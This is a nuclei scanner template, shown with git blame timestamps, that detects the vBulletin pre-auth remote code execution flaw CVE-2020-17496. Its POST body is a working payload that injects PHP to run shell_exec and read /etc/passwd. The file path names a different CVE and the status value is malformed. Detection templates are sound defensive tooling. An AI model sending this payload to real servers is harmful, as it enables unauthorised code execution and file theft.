nuclei-templates/cves/2017/CVE-2017-1000028.yaml

22 lines
637 B
YAML
Raw Normal View History

2021-02-25 06:34:10 +00:00
id: CVE-2020-17496
2021-02-16 08:38:42 +00:00
info:
2021-02-25 06:34:10 +00:00
name: vBulletin Pre-Auth RCE
author: pussycat0x
severity: high
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
tags: cve,cve2020,vbulletin
2021-02-16 08:38:42 +00:00
requests:
2021-02-25 06:34:10 +00:00
- method: POST
path:
- "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel"
body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
2021-02-16 08:38:42 +00:00
- type: status
2021-02-25 06:34:10 +00:00
status:
-200